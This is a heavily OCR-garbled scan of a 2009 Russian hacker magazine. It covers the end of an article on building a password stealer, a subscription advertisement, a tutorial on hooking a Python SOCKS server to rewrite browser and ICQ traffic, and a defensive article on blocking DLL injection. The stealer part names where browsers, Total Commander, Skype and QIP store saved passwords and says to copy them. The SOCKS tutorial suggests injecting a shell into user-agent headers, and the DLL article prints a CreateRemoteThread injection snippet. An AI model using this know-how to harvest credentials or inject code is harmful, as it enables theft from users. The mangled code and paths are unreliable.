З.зідпопз.здіііе — ЗСИйе-база, содержащая все зашифрованные 
пароли. 

4. кеуЗ.сІЬ — база данных, содержащая ключи для сертификатов. 

Все эти файлы расположены в уже знакомой тебе Ооситепі: 
апб 5еШпдз\%ІІ5егІ\Іате%\АррІіса1:іоп 0аІа\Мо2ІИа\РігеРох\ 
Ргой1ез\%Имя профиля%. 

ОРЕКА 

Орега — браузер, который очень популярен среди российских поль- 
зователей. Естественно, мы не можем оставить его без внимания. 
Итак, с Орега ситуация примерно та кая же, ка кис РігеРох. Все 
сохраненные в браузере пароли хранятся по адресу Ооситепіапб 
5еиіпдз\%ІІ5егМаппе%\АррІісайоп ОаІа\Орега\ргоЯІ.е в файле ѵѵапб. 
баі. Получается, при обнаружении Орега мы будем действовать так 
же, как и в случае с РігеРох. 
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Тоіаі Соттапбег — безусловно, самый популярный файловый 
менеджер. Функций в программе содержится приблизительно вагон 
и маленькая тележка (и еще столько же можно на него навесить при 
помощи дополнительных плагинов). Нас интересует лишь встро- 
енный РТР- клиент. Его используют многие, и пароли, конечно же, 
сохраняют. 

ТС в отличие от многих других программ не хранит пароли в реестре, 
а юзает старые добрые і п і -фа й л ы . Пароли, а также все необходимые 
данныедля подключения ксерверам (ір, порт, имя пользователя и 
т.д.) Тоіаі Соттапбег хранит в файле ѵѵсх бТр. і п і , который невинно 
располагается в папке с программой. Путь кдиректории, в которую 
установлен Тоіаі Соттапбег, ты можешь узнать из реестра. Загляни 
в ветку НКЕѴ_СиВВЕМТ_и5ЕП\5о(1:ѵѵаге\0Ы5Іег\То1:аІ Соттапбег. 

РІРЕРОХ 

Сегодня браузер — это не просто программа для ѴѴЕ В - 
путешествий, а целый комбайн, который помимо разнообразных 
возможностей хранит очень много конфиденциальной инфы. Ти- 
пичны й то му пример— ѵѵеЬ-формы. 99% современных сайтов тре- 
буют регистрации. Запомнить и постоянно держать в голове связку 
логин/пароль для каждого сайта — задача нереальная, особенно 
если ты продвинутый пользователь и серфинг интернета у тебя не 
ограничивается одними «Одноклассниками» и «ВКонтакте». 
Разработчики облегчили жизнь пользователям и встроили в про- 



5КѴРЕ 

Популярность скайпа растет каждый день. Многие его используют 
не как средство со вершения звон ко в, а для банально го удобного 
чата. Все сокровенные данные, как и следует ожидать, расположены 
в профиле пользователя (там же, где хранит их опера или РР). Для 
их «приватизации» придется скопировать профиль пользователя 
из Ооситепі: апб 5еШпдз\%и5егІ\Іате%\АррІ.іса1:іоп 0а1:а\5куре\ и 
экспортировать ветку реестра — НКЕѴ_СиВПЕІ\ІТ_ІІ5ЕП\5оіТѵѵаге\ 
5куре\РгоІесІеб5іогаде. 

СИР 

Как и большинство описанных ранее программ, 01 Р все сохранен- 
ные пароли хранит в Арріісабоп ОаіаѴфр. 

С0РѴШ6С0МРІ.ЕТЕ0 

Технология .ІЧЕТ сильно упростила нам задачу, в результате чего 
весь коди н г свелся к вызову нескольких методов. Ты, конечно, 
можешь сказать, что это не круто и что такие штуки куда эффектив- 
ней написать на ѴѴіпАРІ или АЗМ’е. В чем-то я стобой соглашусь, 
но учти, на ѴѴіпАРІ и, тем более, на Асме написать такую программку 
также быстро не удастся. Пока другие пишут километровый код, мы 
с тобой будем собирать урожай. Удачи в программировании, а если 
возникли вопросы, — милости прошу, пиши на мыло. т 
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ГОДОВАЯ ПОДПИСКА ПО ЦЕНЕ 

2100 руб. ( на 15% дешевле чем 

при покупке в розницу) 



Единая цена по всей России. Доставка за счет издателя, 
в том числе курьером по Москве в пределах МКАД 



ВНИМАНИЕ! 

ВТОРОЕ СПЕЦПРЕДЛОЖЕНИЕ! 

При подписке на комплект журналов 

ЖЕЛЕЗО + ХАКЕР + ОШ 

- Один номер всего за 1 55 рублей (на 25% дешевле, чем в розницу) 



ЗА 12 МЕСЯЦЕВ ЗА 6 МЕСЯЦЕВ 




Подписка на журнал «ХАКЕР+ЦѴР» на 6 месяцев 
стоит 1200 руб. 



По всем вопоосам 



связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москвичей) и 
8(800)200-3-999 (для жителей других регионов России, або- 
нентов сетей МТС, БиЛайн и Мегафон). Вопросы о подпис- 
ке можно также направлять по адресу іпіо@дІс.ги или 
прояснить на сайте ѵѵѵѵѵѵ.СЮ.ги 



ВЫГОДА • ГАРАНТИЯ • СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ 

1. Разборчиво заполните подписной купон и квитанцию, вырезав 
их из журнала, сделав ксерокопию или распечатав с сайта ѵѵѵѵѵѵ. 
діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 
квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 119021, Москва, 

ул. Тимура Фрунзе, д. 11, стр. 44, 

ООО «Гейм Лэнд», отдел подписки. 

ВНИМАНИЕ! 

Подписка оформляется в день обработки купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов 
в редакцию по факсу или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по 
почтовому адресу редакции. 

Рекомендуем использовать факс или электронную почту, в последнем 
случае предварительно отсканировав или сфотографировав документы. 
Подписка оформляется с номера, выходящего через один кален- 
дарный месяц после оплаты. Например, если вы производите оплату 
в апреле, то журнал будете получать с июня. 



Оформить подписку на Хакер стало еще проще! 

С июля 2009 года это можно сделать в любом из 
72 000 платежных терминалах ОІѴѴІ (КИВИ) по всей 
России. 




ПОДПИСНОЙ КУПОН 

ПРОШУ ОФОРМИТЬ ПОДПИСКУ 
I НА ЖУРНАЛ « 

□ на 6 месяцев 

□ на 12 месяцев 

начиная с 200 г. 



г -1 Доставлять журнал по почте 
1 — 1 на домашний адрес 

Доставлять журнал курьером : 

□ на адрес офиса* 

□ на домашний адрес** 

(отметь квадрат выбранного варианта подписки) 

Ф.И.О. 



АДРЕС ДОСТАВКИ: 

индекс 

область/край 

город 

улица 

дом корпус 

квартира/офис 

телефон ( ) 

код 

е-таіі 

сумма оплаты 

*в свободном поле укажи название фирмы 
и другую необходимую информацию 
**в свободном поле укажи другую необходимую информацию 
и альтернативный вариант доставки в случае отсутствия дома 

свободное поле 



Извещение 



ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 



р/с N° 40702810509000132297 



к/с № 30101810900000000990 



БИ К 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г 





Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 



ООО «Гейм Лэнд» 



АБ «ОРГРЭСБАНК», г. Москва 
р/с № 40702810509000132297 



к/с № 30101810900000000990 



БИК 044583990 




КПП 770401001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата журнала « 


» 


Сумма 


с 


200 г 





Кассир 



Ф.И.О. 



Подпись плательщика 
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ИГР/Ж С О КС 

ПО ПРОГРАММЁРСКИ 




Прокачиваем аську и браузеры с использованием 
Боскз-сервера на РуІЬоп'е 



Для обычного человека зоскз-сервер — это просто штука, которая 
— і — | позволяет менять ІР. Но хакеру она готова раскрыть еще несколько 
секретов: например, как слушать и в и до из менять трафик, добавляя 
функционал клюбым программам. 



~~і — і 
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ВАРИАНТ 1. ПРОКАЧАЕМ БРАУЗЕР 

После появления браузера боодіе СЬготе я почти полностью перешел 
на него. Бродил ка хороша всем, ноогорчаетограниченный функционал 
и отсутствие плагинов. Значит, теоретически для хакинга он не подходит. 
Спокойно! На помощь придетлокальный зоскз-сервер, через который 
можно направлять весьтрафикСЬготе’а. Это даст возможность безгра- 
ничноувеличиватьфункциональностьбраузера.Так, мы сможем изменять 
заголовки Ыф-запросов (втом числе, изег-адепі) на маленький шелл, 
который часто используется при локальных инклудах. И показывать кукисы, 
параметры, которые передавались скрипту, модифицируя их в автомати- 
ческом режиме. Крометого, станет возможно сохранять все загружаемые 
браузером ресурсы. 

ВАРИАНТ 2. ХРАНИМ СЕКРЕТ СРЕДИ ПАБЛ ИКА 

Об этом методе нестандартного использования соксов я узнал после 
вступления в РОАСгоир. Для внутренних нужд группой был написан 
зоскз-сервер, который во всех Р05Т-запросах искал заданные маркеры и, 
в случае нахождения, шифровал текст между ними с использованием АЕ5 
и ВА5Е64. Стало реально писать на любом сайте, ощущая полную уверен- 
ность, чтолевыелюди этоттекстне прочитают. До шифрованиятекствыгля- 
диттак: [Р0А]зесиге1:ех1:[/Р0А], а зоскз-сервер переделываетего во что-то 
вроде [Р0А]ВА5Е64==[/Р0А]. При загрузке Ыт Петра ниц он автоматически 



выполняетобратное преобразование. Если увидишь где-то на форумах 
среди обычного текста непонятную Ьазе64-строку, — есть вероятность, что 
она содержит какую-либо секретную информацию. 

ВАРИАНТ 3. ШИФРОВАНИЕ АСЬКИ 

Само собой, прокачиванием браузера польза отсокс-серверов не ограни- 
чивается. Обратим взоры на аську (несмотря на происки жабберастов, она 
остается живее всех живых]. Асечка — продукт небезопасный, сообщения 
передаются в явном виден могут быть отсниффаны злобными соседями по 
локале. Передавать интимную информацию в объятия любопытных чуваков 
из интернетов в наши планы не входит, поэтому попробуем пофиксить 
ситуацию. Во-первых, для этой цели существует бесплатный продуктЭітр, 
представляющий собой зоскз-сервер, который автоматически шифрует 
сообщения П5А-ключами. А во-вторых, мне он не нравится :). Поэтому мы с 
тобой рассмотрим создание более легкой и элегантной версии подобного 
софта. Разумеется, с реализацией на РуІЬоп’е. 

ВЫБОР 50СК5-СЕРВЕРА 
И ВНЕДРЕНИЕ В НЕГО 

Эоскз — протокол несложный и хорошо документированный. При желании 
сервер можно закодить самому за три четверти часа, но мы поступим по- 
хакерски, внедрившись в существующий сокс-сервер. Мне больше всего 
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РАНЬШЕ ШИФРОВАНИЕ БЫЛО ВЕСЕЛЕЕ 



нравится зоскз-сервер отХаѵіег І_адгаи1а. Он представляет собой набор 
скриптов, основными среди которых являются РуЗоскз.ру (главная про- 
грамма) изоскз.сопНконфиг). Зайдем в конфиги выставим два параметра: 



05САК. НЕ ПРОТОКОЛ! 



23 24 2У 




РАЗНООБРАЗИЕ 

50СК50В 




ДЛЯ ФАНАТИКОВ АСЬКИ 
ДАЖЕ ЗУБНУЮ ПАСТУ 
ВЫПУСКАЮТ 




ПИТОН ДЛЯ БЛОНДИНОК 



Ъіпс1_асісігезз : 127.000.000.001 
ЫшЗ_рогД : 108 0 

Здесь мы определяем ІР-шники порт, на котором будет висеть зоскз-сервер. 
Теперь можно запустить РуЗоскз.ру и попробовать его в работе. Кстати, при 
запуске сервера ты наверняка заметил черное консольное окошко, которое 
портит внешний вид твоей новой ѴѴіпсіоѵѵ57? Чтобы убрать его, измени рас- 
ширение файла РуЗоскзсруна руѵѵ. 

Затем найдем место внедрения нашего кода. Для этого нужно знать, что для 
чтения данных с сокета есть функция гесѵ. Если мы откроем файл РуЗоскз. 
ру и попробуем поискать название функции, то сразу же найдем следующий 
код (без выделенного жирным шрифтом): 

сіаДа = геас!аЫе_зоск. гесѵ ( зеІД . зегѵег) 

±1 сіаДа: 

іі. геа<ЗаЫе_зоск == с1іепД_80ск: 
шу_Дуре = 1 
еізе : 

ту_Дуре = 2 

сІаДа - ту _Ьаск.ту_1іаск(шу_Дуре / сіаДа) 



шгіДеаЫезІізД [ 0 ] . зет} (сІаДа) 

ІД геас!аЫе_зоск == с1іепД_зоск: 
осДеДз_оиД += Іеп (сіаДа) 
еізе : 

осДеДз_іп += Іеп (сіаДа) 

еізе : 

гаізе СоппесДіоп_С1озесі 

Этот код читает да иные с од но го сокета и записывает их в другой. Именно в 
этотучасток мы и присунем свой код (он как раз выделен). Здесь по значе- 
нию сІіеп1:_50ск мы узнаем, в какую сторону идет информация, и передаем ее 
в нашу функцию ту_Ьаск. Она будет находиться водноименном модуле. То 
есть, все данные после нашего внедрения начнут проходить через ту_Ьаск, 
в котором мы, соответственно, и получим полную власть над информацией. 
Минимальный вариант модуля ту_Ьаск.ру, который должен размещаться в 
каталоге с остальными файлами зоскз-сервера, таков: 

сіеД ту_каск (Дуре, сіаДа) : 
геДигп сіаДа 

Как видим, эта функция (ту_Ьаск) лишьвозвращаетто, что ей передали, и 
поэтому никак не влияет на зоскз-сервер. 
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■ ■ 

> Ііпкз 

• Официальное 
описание протокола 
аськи: сіеѵ.аоі.сот/ 
аіт/озсаг 

• Сайт библио- 
теки для 0Е5- 
шифрования: 

зоигсеЬгде.пеІ:/ 

ргоіесіз/рѵсіез . 

• Написанный на 
РуіЬоп’е зоскз- 
сервер, который мы 
модифицируем: 

зоигсеіогде.пеі/ 

ргоіесіг/ругоскг . 




> СІѴСІ 

• На диске в ожида- 
нии тебя покоятся 
полные скрипты 
написанного зоскз- 
сервера с подробны- 
ми комментариями от 
автора. 

• Без демонстрацион- 
ного видео я тебя не 
оставлю — смотри его 
с нашего диска! 




> іпіо 

50СК5 — сетевой 
протокол, который 
позволяет клиент- 
серверным прило- 
жениям прозрачно 
использовать серви- 
сы за межсетевыми 
экранами (файр- 
волами). «50СК5» 

— это сокращение от 
«БОСКеіБ» (сокеты, 
гнезда). 



05САК 

05 САК — открытый, но не свободный сетевой протокол, обеспечивающий обмен мгновенными и 
оффлайновыми текстовыми сообщениями. В данный момент используется для двух систем компа- 
нии АОЬ (сейчас Тіте ІѴагпег) : ІСО и АІМ. АОЬ открыла спецификации протокола д марта 2008 года 
и разрешила создание альтернативных клиентов. Конечно же. не без ограничений. 



О руЬвп* Міопіи Р6&.7КСС 
Я» Ш У*» Зоик» 1 
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НАПИСАНИЕ СКРИПТА В ЫЕТВЕАЫЗ’Е 



ШИФРОВАНИЕ 

Для реализации функции шифрования я нашел чудесный модуль 
— руРез-ру, сделанный добрыми руками человека по имени Тобб 
ѴѴЬіІетап. Для шифрования или расшифровки с помощью модуля 
нужно создать объект и передать ему пароль и установить параметр 
рабтобе=ру0ез.РА0_РКС55. Дальше все просто — используем 
функцию епсгурідля шифрования и бесгурі для расшифровки. 
Ниже приведен примердвух функций, которыеупрощают про- 
цесс шифровки-дешифровки. Эти функции мы позже будем 
использовать для шифрования сообщений аськи: 

ітрогк руБез 

# функция для шифрования 
бек епсобе (раззѵгогб, бака) : 

к = руБез . без (разз , 

рабшобе = руБез . РАБ_РКС85 ) 
гекигп к . епсгурк (бака) 

# функция для расшифровки 
бек бесобе (раззѵгогб, бака) : 

к = руБез . без (разз , 

рабшобе=руБез . РАБ_РКС85 ) 
гекигп к . бесгурк (бака) 

Мы используем БЕБ-шифрование, но этот модуль также 
поддерживает надежный 30Е5. Аесли захочешь исполь- 
зовать АЕ5, то тут я могу посоветовать использовать Рубіоп 
СгурІюдгарЬуТооІкіЕ 



ПРОТОКОЛ АСЬКИ 

Самый сложный момент— разобраться с протоколом аськи. Я 
честно начал вкуривать в документацию и даже прочел пару 
страниц, нозатем мотивация иссякла, я бросил теорию и пере- 
шел к изучению протокола методом проб и ошибок. 

Для анализа протокола сохраним несколько сообщений. Тут 
подойдеттакой код в нашей функции ту_Ьаск: 

#если исходящее соединение 
ік куре == 1 : 

кііе = ореп ( ' кхк . ' , ' ѵг+ ' ) 
кііе . шгіке (бака) 
кііе . сіозе ( ) 

При просмотре сохраненных сообщений стало ясно, что во 
всех них вначале идет0х2а02, далее — 2 байта (число, которое 
увеличивается на единицу при каждом следующем обмене 
данными ссервером). Следующими идут2 байта, которые 
обозначают длину всего блока данных, без учета первыхб байт. 
После заголовка идет блок данных; для исходящих сообщений 
он всегда начинается с 0x00040006. 

В блоке данных важным полем является байте номером 26. 

В нем содержится размер номера аськи. Размер номера за- 
помним обязательно, ведь при расчете остальных смещений 
нужно учитывать длину номера. Слово по адресу 39 поме- 
щаете себе размер сообщения + 4 байта. Само сообщение 
начинается с адреса 45 + длина_номера аськи. Теперь у нас 



► 100 



ХАКЕР 08 /1 28/ 09 






о р/гьоп . ЮЕ 6.7 КСзЧ 



Рііе Егік Ѵіеѵѵ Маѵідле 5оигсе Ке*а«ог Кип ОеЬид Теат ТоЫі ѴѴілао* Н«Ір 



ътяѣ ■ос 



-] 'в* іа і> о й і&- ОѲіііі 



|С^*' ЗеагсЬ (СЫ+Г)~ 




Ысяпд С:\РѵіЬоп25 
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достаточно информации, чтобы считать сообщение для последующего 
шифрования: 

іі Суре == 1 : 

# отбираем только исходящие сообщения аськи 
іббаба[0:2] == 1 \х2а\х02 ' 

апб баба [ 6 : 10 ] == ' \х00\х04\х00\х06 ' : 

# определяем длину номера аськи 
1еп_пшп = огб(баба[2б] ) 

# определяем длину сообщения 
1еп_тзд = огб (баба [39+1еп_пит] ) *256 

+огб (баба [40+1еп_пит] ) -4 

# читаем сообщение 

тзд = баба [45+1еп_гшт: 45+1еп_пит+1еп_тзд] 

Итак, что здесь происходит? Мы отбираем только исходящие сообщения, 
определяем длину номера аськи, дли ну сообщен ия и само сообщение. 
Теперьсообщение нужнозашифроватьи под готовить к отправке, закодируя 
его в Ьазе64 и используя встроенный модуль Ьазе64, чтобы избавиться от 
спецсимволов, которые могли появиться при шифровании 0Е5 и повлиять 
на передачу сообщения: 

епс_шзд = епсобе(разз, шзд) 

епс_тзд = Ьазеб4 . епсобезбгіпд (епс_тзд) 

Сообщение полностью готово квнедрению! Теперь мы можем заменить 
исходное сообщение на зашифрованное. После этого нужно подкорреети- 
ровать поля, которые отвечают за размер сообщения, ведь без них сервер 
посчитает, что это ошибочное сообщение и не пропуститего. 

# определяем длину сообщения 
1еп_епс_шзд = Іеп (епс_шзд) +4 
1еп_пшп_1 = сЬ.г ( 1еп_епс_тзд / 256) 

1еп_пшп_2 = сбит ( 1еп_епс_тзд % 256) 



# создаем исходящий пакет данных 
баба = баба [ 0 : 39+1еп_пиш] + 1еп_пиш_1 

+ 1еп_пшп_2 + 7 \х00\х02\х00\х00 ' 

+ епс_шзд + баба [45+1еп_пит+1еп_шзд : ] 

Осталось лишь подкорректировать 5-й и 6-й байт, которые отвечают за раз- 
мер всего пакета данных: 

# определяем длину пакета данных 
1еп_а11 = Іеп (баба) -6 
1еп_а11_1 = сЪт ( 1еп_а11 /256) 

1еп_а11_2 = сЪт ( 1еп_а11 % 256) 

# формируем полностью готовый к отправке пакет 
баба = баба [0 : 4] +1еп_а11_1 + 1еп_а11_2 + баба [6:] 

Здесь мы используем вторую и третью строчки (деление и взятие остатка от 
деления], чтобы преобразовать число из десятичного значения в Ьех. 

На этом часть, посвященная исходящим сообщениям, завершена. Дешиф- 
ровочную мы приводить здесь и не будем. Во-первых, ты сможешь написать 
все самостоятельно, интуитивно ориентируясь на предыдущий код, а во- 
вторых, ее можно просто списать из исходника на диске. 

ОТНЮДЬ НЕ МИФ 

Мы рассмотрели несколько интересных примеров, которые наглядно 
демонстрируют, что прокачка обычных программ с помощью сокс-сервера 
— вовсе не миф. Правда, в разделе, посвященном прокачке браузера, мы 
не коснулись ситуации, когда ему приходится работать по Шрз. Ситуация 
довольно сложная, и решение в статье не поместится, поэтому я ограничусь 
намеком на скрипт, позволяющий обходитьограничение. Имя емуззізігір, и 
он был описан в 12-м номере нашего журнала. 

Кстати, мы всеждем оттебя обратной связи! Что тебе интересно? Какиетемы 
ты нам предложишь раскрыть? Мы —твои рабы, приказывай, повинуемся :). 
Конечно, идей у нас с Лозовским еще вагон, но хотелось бы иметь п ред став - 
лениеотом, что интересно именнотебе.Ждем писем: зрігиОйдтаіІ.сопп!^ 
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ВИРУСОПИСАТЕЛЕИ 



Низкоуровневая защита от вредоносного 
кода в домашнихусловиях 



В этой статье речь пойдет о том, как, имея под рукой ѴѴіпйОК и обла- 
дая некоторыми навыками программирования, можноза короткий 

++++ 

срок соорудить вполне приличную тулзу, защищающую системные 
файлы и процессы ѴѴіпсІоѵѵз от интимного общения с вирусами. 



+ + + + 



+ + + + 



А НАЧАЛОСЬ ВСЕ С СОЫРІСКЕК А 

Да-да, червь, который заразил свыше 10 млн. компьютеров по всему свету, 
не обошел стороной и мою машину. Рискну вызвать бурю эмоций в свой 
адрес со стороны воспитанных «продвинутых» пользователей — я не 
пользуюсьантивирусами, предпочитая обходиться собственными силами 
и соблюдая правила личной гигиены. В случаезаражения я вылавливаю 
заразу самостоятельно, не прибегая к помощи антивирусного софта. Поче- 
му я считаю антивирусы плохой затеей? Ответ на этот философский вопрос 
ищи в книге многоуважаемого Криса Касперски «Записки исследователя 
компьютерных вирусов» в главе «Почему антивирусы стали плохой идеей». 
Я с его выводами абсолютно согласен. 

В результате, несмотря на то, что я обычно сижу под админским аккаунтом 
(правильно, а чего мелочиться?) вирусы на моем рабочем компе — редкий 



гость. Однако на этот раз мне не повезло. Все началось стого, что ни с 
того, ни с сего с ошибкой записи памяти начал вылетать зѵсбозДехе. Для 
стабильно работающей машины — исключительная редкость. Это сразу 
меня насторожило, побудив прошерстить комп на предмет подозрительных 
файлов и записей в реестре. Я даже не сомневался, что зараза явилась 
посредством автозапуска с зараженной флешки (умная мысль отключить 
автозапуске ІІ5В-носителей, пришла, каквеегда, опосля). 

В процессе организованного поиска заразы подозрительных ехе’шников я в 
системе не обнаружил. Это навело меня на мысль о некоей 611, незаметно под- 
груженной в один из системных процессов. Подумано-сделано, и при осмотре 
директории зузІет32 искомая бИ-ка была локализована. Удаление оказалось 
невозможно даже в безопасном режиме, что говорило отом, что она успешно 
грузится в один из основных системных процессов — зѵсбозіехе. 
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Рііе Асбоп 5еШр Іапдцаде ТооІ5 Неір 



550Т Ноок$ Ое*есІог/Ре$*огег | Ніббеп Ргосе$зе5 йе^есіог | Ніббеп Огіѵегз Ре^ес^ог | Ніббеп Рі1е$ йе^есіог Собе Ноокз йеіегіог | Керог* | 



Ноокесі ОЬіесІ 


Ноок Аббге5$ апб І.осайоп 


Туре оР Ноок 


1 


$ѵсЬо$Еехе -> п^бй.бІІ -> №<ЗиегуІпРогтаиопРог* 


0х018Е9ОС2 - [ипкпоѵѵп тобиіе] 


Іпііпе 




$ѵсЬо5*.ехе -> п^бИ.бІІ -> М:<ЗиегуІп^огтайопРгосе55 


0х018Е9ОС2 - [ипкпоѵѵп тобиіе] 


Іпііпе 




5ѵсЬо$С.ехе -> п^бй.бІІ -> 2ѵѵС$иегуІп[огтайопРогІ: 


0x018691X2 - [ипкпоѵѵп тобиіе] 


Іпііпе 




$ѵсЬо5*.ехе -> п^бй.бІІ -> 2ѵѵ<ЗиегуІпРогтайопРгосе55 


0x018691X2 - [ипкпоѵѵп тобЫе] 


Іпііпе 




зѵсЬозІ.ехе -> п^бй.біі -> М^иегуІпРогтаІіопРогІ 


0х00АВ9ОС2 - [ипкпоѵѵп тобиіе] 


Іпііпе 




$ѵсЬо5к.ехе -> п^бЙ.бІІ -> Г'Л<ЗиегуІпРогтайопРгосе5$ 


0х00АВ9ОС2 - [ипкпоѵѵп тобиіе] 


Іпііпе 




5ѵсЬо$*.ехе -> п^бй.бІІ -> 2ѵѵС$иегуІп?огтайопРог* 


0х00АВ9ОС2 - [ипкпоѵѵп тобиіе] 


Іпііпе 




$ѵсЬо5*.ехе -> пМИ.бІІ -> 2ѵѵ<2иегуІпРогтайопРгосе$$ 


ОхООАВ9РС2 - [ипкпоѵѵп тобиіе] 


Іпііпе 





















СИСТЕМНЫЕ ФУНКЦИИ ПЕРЕХВАЧЕНЫ ВИРУСОМ 

Вооружившисьутилитами отЗузіпІегпаІз, я постарался проанализиро- 
вать действия заразы. И обнаружил, что сІИ-ка скрывает себя из списка 
загруженных в адресное пространство процессов путем патча двусвязного 
списка в РЕВ’е (подробно эта техника описана в моей же статье в майском 
~іг поэтому просмотрщики типа РЕТооІз здесь не помогут. Не помогла и ути- 
литка ЫзШИз отЭузіпІегпаІБ, позволяющая просмотреть все загруженные 
в процесс библиотеки. И только маленькая тулза НапсІІеѴіеѵѵег показала 
хендл Іерщтіх.би, загруженный в зѵсбозЕехе. Эта библиотека, как потом 
выяснилось, создавала левыезаписи в реестре, позволяющие ей выжить 
в системе. 

Какследствие работы этой заразы, я получил перехват нескольких си- 
стемных функций в п Ши. б и, а также функций для работы с интернетом, что 
приводило к тотальному облому при попытке посещения сайтов, посвя- 
щенных компьютерной безопасности. Мелочь, а неприятно. Мегамощная 
вещь— РКІІпбоокег — показала появившиеся в системе перехваты. 
Промучившись несколько дней с бесплатными утилитами отизвестных 
антивирусных брендов, выпущенных специально для удаления СопГскег’а 
(типа КібоКіІІегОтКАѴ или ЕСопбскегРетоѵеготЕЭЕТ), я пришел квыводу, 
что кардинальных решений ни одно из опробованных средств не пред- 
лагает, поскольку на тот моментони ограничивалисьудалением Іерщтіх. 
би и парочки других файлов, а также — чисткой реестра. Все это хозяйство 
работало только в течение первого часа, затем история повторялась — не- 
известный процесс маппил в зѵсбозЕехе вышеуказанную Іериітіх.би, и 
система вновь возвращалась кзараженному состоянию. 

Перезагрузка в безопасном режиметоже проблемы не решила — 611 все 
равно подгружалась в зѵсбозЕехе и удалить ее было невозможно. 

Читать маны об очистке системы отСопбскег’а, которые можно в изобилии 
найти на бескрайних просторах интернета, не хотелось; устанавливать тя- 
желую артиллерию в виде антивирусного пакета —тем более. Воттогда-то 
мне и пришла в голову мысль написать что-то типа собственной проактив- 
ки, защищающей системные файлы и процессы от внедрения постороннего 
кода. 

САМ СЕБЕ АНТИ ВИРУС 

Решение напрашивалось само собой: все, что нужно сделать, — за- 
претить загруз ку сторон них 611 в системные процессы. Легче всего это 
осуществить путем перехвата системной функции ЕоабЫЬгагу или, что еще 
лучше, ЕсІгЕоасЮи. Эти вещи я реализовал в виде драйвера, однако мне 



этого показалось мало, и я решил на скорую руку наваять нечто большее, 
поскольку надежно защитить системные файлы перехватом одной только 
ЕсІгЕоасЮи в ряд л и возможно. В порыве вдохновения я добавил пере- 
хваттаких системных вызовов, как ЫЮрепРгосезз, ЫііѴѴгМіеѴігТиаІМеппогу 
и ЫіРеабѴігІиаІМетогу и еще парочки других. В результате, получилась 
самопальная проактивная защита системных процессов. Можно добавить 
ограничениедоступа креестру, нотакой цели я перед собой неставил. 
Изначально можно было, конечно, найти хендл зловредной библиотеки 
и по нему выгрузить ее через ЕгееЫЬгагу, но мне показалось, что этого 
недостаточно. Чем постоянно искать и выгружать из процесса невесть от- 
куда взявшуюся библиотеку, проще сделатьтак, чтобы она туда вообще не 
грузилась. 

Этим мы и займемся. Какты знаешь, загрузка б II в адресное пространство 
чужого процесса обычно происходит через вызов СгеаІеРетоІіеТТігеаб. 
Примернотак: 

ЬРгосезз = ОрепРгосезз (...); 

ЬіЪРіІеКетоСе = (РѴ/8ТК) ѴігСиаІАІІосЕх (Ъ.Ргосезз . . . ) ; 
ШгіСеРгосеззМетогу (ЪРгосезз , ЬіЪРіІеКетоСе , . . . ) ; 

РТНКЕ АД_8 ТАКТ_КОІІТ I ЫЕ РпТАгеасбКСп = 

(РТНКЕАВ_ЗТАКТ_КООТШЕ) СеВРгосАсМгезз ( 

СеШосІиІеНапсІІе (ТЕХТ ( "Кегпе132 " ) ) , "ЬоасбЫЬгагу^" ) ; 

ЪТЪхеас! = СгеаСеКетоСеТІігеасІ (ЪРгосезз , ЖГЬЬ, О, 
ГпТЪгеасЗКЪп , ЬіЬЕіІеКетоСе , О, ШЬЬ) ; 

ЕбгЕоасЮИв свою очередь сводится кнеэкспортируемым вызовам 
ЕбгрЕоабМобиІе и ЕбгАйасбРгосезз, которые просто проецируютзагружае- 
мую библиотеку в адресное пространство целевого процесса. 

Отлично, теперь постараемся максимально осложнитьжизнь всяким виру- 
сописателям и заставим систему советоваться с нами при попытке загрузки 
сторонних библиотек. 

СТАВИМ ПОД КОНТРОЛЬ ЗАГРУЗКУ ОІ_І_ 

Главную смысловую нагрузку в нашем коде несет перехватсистемной 
функции ЕсІгЕоасЮи, а основной проблемой, стоящей перед нами, будет 
определение адреса функции ЕсІгЕоасЮи в таблице экспорта пІбІЕбІЕ 
В изегтобеэта проблема решается нетрудно — достаточно найти пШ. 
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Т Зегѵісе №те 


| НоокесІ | 


Ьббгек 


Могіиіе 


17 


МАІІоса^еѴігШаІМетогу 


Ѵе$ 


0хР8В1С30А 


С:\ѴѴШРОК\2600. 1 106\оЬ)Рге_ѵѵхр_х86\і386\... 


47 


№Сгеа*еРгосе$5 


Ѵе$ 


0хР8В1С300 


С:\МШОК\2600. 1 106\оЬ)Гге_ѵѵхр__х86\і386\... 


186 


ГМКеасіѴігШаІМетогу 


Ѵе$ 


0хР8В1С31Е 


С:\\Л/ШОйК\2600. 1 106\оЬ)Рге_ѵѵхр_х86\і386\... 


277 


№\А/гКеѴіг^иаІМетогу 


Ѵе$ 


0хР8В1С314 


С:\ММХЖ\2600. 1 1 06\оЬ)Рге_ѵѵхр_х86\і386\ . . . 


0 


№АссерКоппесІ:Рог^ 


- 


0х805А4614 


С : \\А/ІШОѴѴ5\5у5*ет32\п*кгпІра . ехе 


1 


№Ассе$5СЬеск 


- 


0х805Р0АОС 


С : \ѴѴШООѴѴ5\$у $*ет32\п*кгпІра . ехе 


2 


№Ассв5$СЬескАпгіАи<йАІагт 


-■ 


0Х805Р4312 


С : \\Л/ШОО\Л/5\$у5Ьет32\п*кгпІра . ехе 


3 


№ Ассе55СЬескВу Т уре 


- 


0х805Р0В0Е 


С : \ѴШОО\М5\$у5*ет32\п*кгпІра . ехе 


4 


№Ассе55СЬескВуТуреАпсІАисЙАІагт 


- 


0Х805Р434С 


С : \№ІГОО\А/5\5у5^ет32\п^кгпІра . ехе 


5 


№ Ассе$5СЬескВу Т у реке5ик1і$^ 


- 


0х805Р0В44 


С : \ѴШОО№5\$у$кет32\п*кгпІра . ехе 


6 


№Ассе55СЬескВуТуреРе5иІШ5^АпгіАисЙАІагт 


- 


0Х805Р4390 


